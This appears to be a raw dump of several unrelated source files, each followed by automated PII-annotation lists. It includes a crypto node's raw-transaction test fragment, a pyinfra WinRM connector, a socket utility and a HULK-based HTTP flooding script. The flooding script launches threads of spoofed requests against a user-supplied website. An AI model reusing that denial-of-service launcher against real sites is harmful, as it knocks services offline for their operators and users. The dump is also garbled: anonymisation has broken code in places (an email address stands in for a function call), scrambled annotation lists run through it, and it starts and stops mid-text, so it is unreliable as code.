sign the tx + rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']]) + self.log.debug(rawTxComb) + self.nodes[2].sendrawtransaction(rawTxComb) + rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx + + # decoderawtransaction tests + # witness transaction + encrawtx = ""PI:KEY"" + decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction + assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000')) + assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction + # non-witness transaction + encrawtx = ""PI:KEY"" + decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction + assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000')) + # known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579) + encrawtx = ""PI:KEY"" + decrawtx = self.nodes[0].decoderawtransaction(encrawtx) + decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True) + assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction + assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen + assert_equal(decrawtx['vin'][0]['coinbase'], ""PI:KEY"") + + # Basic signrawtransaction test + addr = self.nodes[1].getnewaddress() + txid = self.nodes[0].sendtoaddress(addr, 10) + self.nodes[0].generate(1) + self.sync_all() + vout = find_vout_for_address(self.nodes[1], txid, addr) + rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999}) + rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx) + txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex']) + self.nodes[0].generate(1) + self.sync_all() + + # getrawtransaction tests + # 1. valid parameters - only supply txid + assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex']) + + # 2. valid parameters - supply txid and 0 for non-verbose + assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex']) + + # 3. valid parameters - supply txid and False for non-verbose + assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex']) + + # 4. valid parameters - supply txid and 1 for verbose. + # We only check the ""hex"" field of the output so we don't need to update this test every time the output format changes. + assert_equal(self.nodes[0].getrawtransaction(txId, 1)[""hex""], rawTxSigned['hex']) + + # 5. valid parameters - supply txid and True for non-verbose + assert_equal(self.nodes[0].getrawtransaction(txId, True)[""hex""], rawTxSigned['hex']) + + # 6. invalid parameters - supply txid and string ""Flase"" + assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, ""Flase"") + + # 7. invalid parameters - supply txid and empty array + assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, []) + + # 8. 
invalid parameters - supply txid and empty dict + assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, {}) + + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 1000}] + outputs = { self.nodes[0].getnewaddress() : 1 } + rawtx = self.nodes[0].createrawtransaction(inputs, outputs) + decrawtx= self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['vin'][0]['sequence'], 1000) + + # 9. invalid parameters - sequence number out of range + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : -1}] + outputs = { self.nodes[0].getnewaddress() : 1 } + assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs) + + # 10. invalid parameters - sequence number out of range + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967296}] + outputs = { self.nodes[0].getnewaddress() : 1 } + assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs) + + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967294}] + outputs = { self.nodes[0].getnewaddress() : 1 } + rawtx = self.nodes[0].createrawtransaction(inputs, outputs) + decrawtx= self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['vin'][0]['sequence'], 4294967294) + + #################################### + # TRANSACTION VERSION NUMBER TESTS # + #################################### + + # Test the minimum transaction version number that fits in a signed 32-bit integer. + # As transaction version is unsigned, this should convert to its unsigned equivalent. + tx = CTransaction() + tx.nVersion = -0x80000000 + rawtx = ToHex(tx) + decrawtx = self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['version'], 0x80000000) + + # Test the maximum transaction version number that fits in a signed 32-bit integer. + tx = CTransaction() + tx.nVersion = 0x7fffffff + rawtx = ToHex(tx) + decrawtx = self.nodes[0].decoderawtransaction(rawtx) + assert_equal(decrawtx['version'], 0x7fffffff) + + self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate') + + # Test a transaction with a small fee. + txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0) + rawTx = self.nodes[0].getrawtransaction(txId, True) + vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000')) + + self.sync_all() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }] + # Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999 + outputs = { self.nodes[0].getnewaddress() : Decimal(""0.99990000"") } + rawTx = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx) + assert_equal(rawTxSigned['complete'], True) + # Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB + # Thus, testmempoolaccept should reject + testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0] + assert_equal(testres['allowed'], False) + assert_equal(testres['reject-reason'], 'max-fee-exceeded') + # and sendrawtransaction should throw + assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. 
-maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000) + # and the following calls should both succeed + testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0] + assert_equal(testres['allowed'], True) + self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex']) + + # Test a transaction with a large fee. + txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0) + rawTx = self.nodes[0].getrawtransaction(txId, True) + vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000')) + + self.sync_all() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }] + # Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98 + outputs = { self.nodes[0].getnewaddress() : Decimal(""0.98000000"") } + rawTx = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx) + assert_equal(rawTxSigned['complete'], True) + # Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB + # Thus, testmempoolaccept should reject + testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0] + assert_equal(testres['allowed'], False) + assert_equal(testres['reject-reason'], 'max-fee-exceeded') + # and sendrawtransaction should throw + assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex']) + # and the following calls should both succeed + testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0] + assert_equal(testres['allowed'], True) + self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000') + + +if __name__ == '__main__': + RawTransactionsTest().main() +",28831,"[['MEDICAL_LICENSE', 'ZZ0000000'], ['MEDICAL_LICENSE', 'ZZ0000000'], ['DATE_TIME', '2014-2020'], ['NRP', 'OrderedDict'], ['PERSON', 'Constructed'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'json'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'address2'], ['PERSON', 'locktime'], ['PERSON', 'locktime'], ['PERSON', 'address2'], ['PERSON', 'address2'], ['PERSON', 'tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress'], ['PERSON', 'self.sync_all'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['PERSON', 'mSigObj = self.nodes[2].addmultisigaddress(2'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['LOCATION', 'addr.'], ['PERSON', 'addr3'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'addr3Obj'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['URL', 'https://github.com/bitcoin/bitcoin/issues/20579'], ['URL', 'framework.me'], ['URL', 'self.se'], ['URL', 'self.nu'], ['URL', 'self.su'], ['URL', 'self.sk'], ['URL', 'self.co'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 
'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.options.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 
'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no']]" +77,"from __future__ import print_function, unicode_literals + +import base64 +import ntpath + +import click + +from pyinfra import logger +from pyinfra.api import Config +from pyinfra.api.exceptions import ConnectError, PyinfraError +from pyinfra.api.util import get_file_io, memoize, sha1_hash + +from .pyinfrawinrmsession import PyinfraWinrmSession +from .util import make_win_command + + +def _raise_connect_error(host, message, data): + message = '{0} ({1})'.format(message, data) + raise ConnectError(message) + + +@memoize +def show_warning(): + logger.warning('The @winrm connector is alpha!') + + +def _make_winrm_kwargs(state, host): + kwargs = { + } + + for key, value in ( + ('username', host.data.winrm_user), + ('password', host.data.winrm_password), + ('winrm_port', int(host.data.winrm_port or 0)), + ('winrm_transport', host.data.winrm_transport or 'plaintext'), + ('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30), + ('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20), + ): + if value: + kwargs[key] = value + + # FUTURE: add more auth + # pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp + # see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12 + + return kwargs + + +def make_names_data(hostname): + + show_warning() + + yield dummy@email.com(hostname), {'winrm_hostname': hostname}, [] + + +def connect(state, host): + ''' + Connect to a single host. Returns the winrm Session if successful. 
+ ''' + + kwargs = _make_winrm_kwargs(state, host) + logger.debug('Connecting to: %s (%s)', host.name, kwargs) + + # Hostname can be provided via winrm config (alias), data, or the host's name + hostname = kwargs.pop( + 'hostname', + host.data.winrm_hostname or host.name, + ) + + try: + # Create new session + host_and_port = '{}:{}'.format(hostname, host.data.winrm_port) + logger.debug('host_and_port: %s', host_and_port) + + session = PyinfraWinrmSession( + host_and_port, + auth=( + kwargs['username'], + kwargs['password'], + ), + transport=kwargs['winrm_transport'], + read_timeout_sec=kwargs['winrm_read_timeout_sec'], + operation_timeout_sec=kwargs['winrm_operation_timeout_sec'], + ) + + return session + + # TODO: add exceptions here + except Exception as e: + auth_kwargs = {} + + for key, value in kwargs.items(): + if key in ('username', 'password'): + auth_kwargs[key] = value + + auth_args = ', '.join( + '{0}={1}'.format(key, value) + for key, value in auth_kwargs.items() + ) + logger.debug('%s', e) + _raise_connect_error(host, 'Authentication error', auth_args) + + +def run_shell_command( + state, host, command, + env=None, + success_exit_codes=None, + print_output=False, + print_input=False, + return_combined_output=False, + shell_executable=Config.SHELL, + **ignored_command_kwargs +): + ''' + Execute a command on the specified host. + + Args: + state (``pyinfra.api.State`` obj): state object for this command + host: the target host object + command (string): actual command to execute + success_exit_codes (list): all values in the list that will return success + print_output (boolean): print the output + print_input (boolean): print the input + return_combined_output (boolean): combine the stdout and stderr lists + shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell (default) + env (dict): environment variables to set + + Returns: + tuple: (exit_code, stdout, stderr) + stdout and stderr are both lists of strings from each buffer. + ''' + + command = make_win_command(command) + + logger.debug('Running command on %s: %s', host.name, command) + + if print_input: + click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True) + + # get rid of leading/trailing quote + tmp_command = command.strip(""'"") + + if print_output: + click.echo( + '{0}>>> {1}'.format(host.print_prefix, command), + err=True, + ) + + if not shell_executable: + shell_executable = 'ps' + logger.debug('shell_executable:%s', shell_executable) + + # we use our own subclassed session that allows for env setting from open_shell. 
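+# [Editor's note -- hedged sketch, not pyinfra's actual PyinfraWinrmSession.
+# Stock pywinrm Session.run_cmd()/run_ps() take no env argument, but the
+# lower-level Protocol.open_shell() accepts env_vars, so a subclass along
+# these lines is presumably what the PyinfraWinrmSession import provides.]
+from winrm import Response, Session
+
+class EnvWinrmSession(Session):
+    # Same flow as pywinrm's Session.run_cmd(), except the env dict is
+    # forwarded into the remote shell when it is opened.
+    def run_cmd(self, command, args=(), env=None):
+        shell_id = self.protocol.open_shell(env_vars=env)
+        command_id = self.protocol.run_command(shell_id, command, args)
+        rs = Response(self.protocol.get_command_output(shell_id, command_id))
+        self.protocol.cleanup_command(shell_id, command_id)
+        self.protocol.close_shell(shell_id)
+        return rs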
+ if shell_executable in ['cmd']: + response = host.connection.run_cmd(tmp_command, env=env) + else: + response = host.connection.run_ps(tmp_command, env=env) + + return_code = response.status_code + logger.debug('response:%s', response) + + std_out_str = response.std_out.decode('utf-8') + std_err_str = response.std_err.decode('utf-8') + + # split on '\r\n' (windows newlines) + std_out = std_out_str.split('\r\n') + std_err = std_err_str.split('\r\n') + + logger.debug('std_out:%s', std_out) + logger.debug('std_err:%s', std_err) + + if print_output: + click.echo( + '{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)), + err=True, + ) + + if success_exit_codes: + status = return_code in success_exit_codes + else: + status = return_code == 0 + + logger.debug('Command exit status: %s', status) + + if return_combined_output: + std_out = [('stdout', line) for line in std_out] + std_err = [('stderr', line) for line in std_err] + return status, std_out + std_err + + return status, std_out, std_err + + +def get_file( + state, host, remote_filename, filename_or_io, + **command_kwargs +): + raise PyinfraError('Not implemented') + + +def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048): + # this should work fine on smallish files, but there will be perf issues + # on larger files both due to the full read, the base64 encoding, and + # the latency when sending chunks + with get_file_io(filename_or_io) as file_io: + data = file_io.read() + for i in range(0, len(data), chunk_size): + chunk = data[i:i + chunk_size] + ps = ( + '$data = [System.Convert]::FromBase64String(""{0}""); ' + '{1} -Value $data -Encoding byte -Path ""{2}""' + ).format( + base64.b64encode(chunk).decode('utf-8'), + 'Set-Content' if i == 0 else 'Add-Content', + remote_location) + status, _stdout, stderr = run_shell_command(state, host, ps) + if status is False: + logger.error('File upload error: {0}'.format('\n'.join(stderr))) + return False + + return True + + +def put_file( + state, host, filename_or_io, remote_filename, + print_output=False, print_input=False, + **command_kwargs +): + ''' + Upload file by chunking and sending base64 encoded via winrm + ''' + + # Always use temp file here in case of failure + temp_file = ntpath.join( + host.fact.windows_temp_dir(), + 'pyinfra-{0}'.format(sha1_hash(remote_filename)), + ) + + if not _put_file(state, host, filename_or_io, temp_file): + return False + + # Execute run_shell_command w/sudo and/or su_user + command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename) + status, _, stderr = run_shell_command( + state, host, command, + print_output=print_output, + print_input=print_input, + **command_kwargs + ) + + if status is False: + logger.error('File upload error: {0}'.format('\n'.join(stderr))) + return False + + if print_output: + click.echo( + '{0}file uploaded: {1}'.format(host.print_prefix, remote_filename), + err=True, + ) + + return True + + +EXECUTION_CONNECTOR = True +",7847,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'winrm_port'], ['PERSON', 'winrm_transport'], ['PERSON', 'host.data.winrm_transport'], ['PERSON', 'host.data.winrm_hostname'], ['PERSON', 'host_and_port'], ['PERSON', 'TODO'], ['PERSON', 'Args'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['PERSON', 'tmp_command = command.strip'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['LOCATION', 'chunk_size=2048'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['URL', 
'https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12'], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'host.na'], ['URL', 'logger.de'], ['URL', 'kwargs.it'], ['URL', 'kwargs.it'], ['URL', 'logger.de'], ['URL', 'Config.SH'], ['URL', 'pyinfra.api.St'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'command.st'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'host.connection.ru'], ['URL', 'host.connection.ru'], ['URL', 'response.st'], ['URL', 'logger.de'], ['URL', 'response.st'], ['URL', 'out.de'], ['URL', 'response.st'], ['URL', 'err.de'], ['URL', 'logger.de'], ['URL', 'logger.de'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'io.re'], ['URL', 'System.Co'], ['URL', 'logger.er'], ['URL', 'ntpath.jo'], ['URL', 'logger.er'], ['URL', 'click.ec'], ['URL', 'host.pr']]" +78,"# +# (C) Copyright 2011 Jacek Konieczny dummy@email.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License Version +# 2.1 as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this program; if not, write to the Free Software +# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. +# +# pylint: disable-msg=W0201 + +""""""Utility functions to wait until a socket (or object implementing .fileno() +in POSIX) is ready for input or output."""""" + +from __future__ import absolute_import, division + +__docformat__ = ""restructuredtext en"" + +import select + +if hasattr(select, ""poll""): + def wait_for_read(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for reading. + """""" + if timeout is not None: + timeout *= 1000 + poll = select.poll() + poll.register(socket, select.POLLIN) + events = poll.poll(timeout) + return bool(events) + def wait_for_write(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for writing. + """""" + if timeout is not None: + timeout *= 1000 + poll = select.poll() + poll.register(socket, select.POLLOUT) + events = poll.poll(timeout) + return bool(events) +else: + def wait_for_read(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for reading. + """""" + readable = select.select([socket], [], [], timeout)[0] + return bool(readable) + def wait_for_write(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for writing. 
+ """""" + writable = select.select([], [socket], [], timeout)[1] + return bool(writable) + +",2121,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2011'], ['PERSON', 'Jacek Konieczny'], ['LOCATION', 'Mass Ave'], ['LOCATION', 'Cambridge'], ['LOCATION', 'MA 02139'], ['LOCATION', 'USA'], ['URL', 'email.com'], ['URL', 'poll.re'], ['URL', 'poll.re'], ['URL', 'select.se'], ['URL', 'select.se']]" +79,""""""" +HTTP UNBEARBALE LOAD QUEEN +A HULK EDIT BY @OBN0XIOUS +THE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY +"""""" + +import sys +import argparse +import random +from threading import Thread + +import hulqThreading +import hulqRequest + +parser = argparse.ArgumentParser() +parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.') +parser.add_argument('--website', '-w', help='Website you are attacking.') +systemArguments = parser.parse_args() + +if not systemArguments.website: + sys.exit(""Provide -w or --website."") + +userAgents = \ + ( + 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3', \ + 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \ + 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \ + 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1', \ + 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \ like Gecko Chrome/4.0.219.6 Safari/532.1', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2', \ + 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US', \ + 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP', \ + 'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51' + ) + + +referers = \ + ( + 'http://www.google.com/?q=', \ + 'http://www.usatoday.com/search/results?q=', \ + 'http://engadget.search.aol.com/search?q=' + ) + + + +for i in range(0, int(systemArguments.threads)): + referer = random.choice(referers) + userAgent = random.choice(userAgents) + t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer)) + t1.start() +",2175,"[['LOCATION', ""help='Choose""], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['LOCATION', 'US'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['URL', 't1.st'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '4.0.219.6'], ['DATE_TIME', '1.1.4322'], ['DATE_TIME', '2.5.22'], ['URL', ""http://www.google.com/?q=',""], ['URL', ""http://www.usatoday.com/search/results?q=',""], ['URL', ""http://engadget.search.aol.com/search?q='""], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'systemArguments.th'], ['URL', 'random.ch'], ['URL', 'random.ch'], ['URL', 
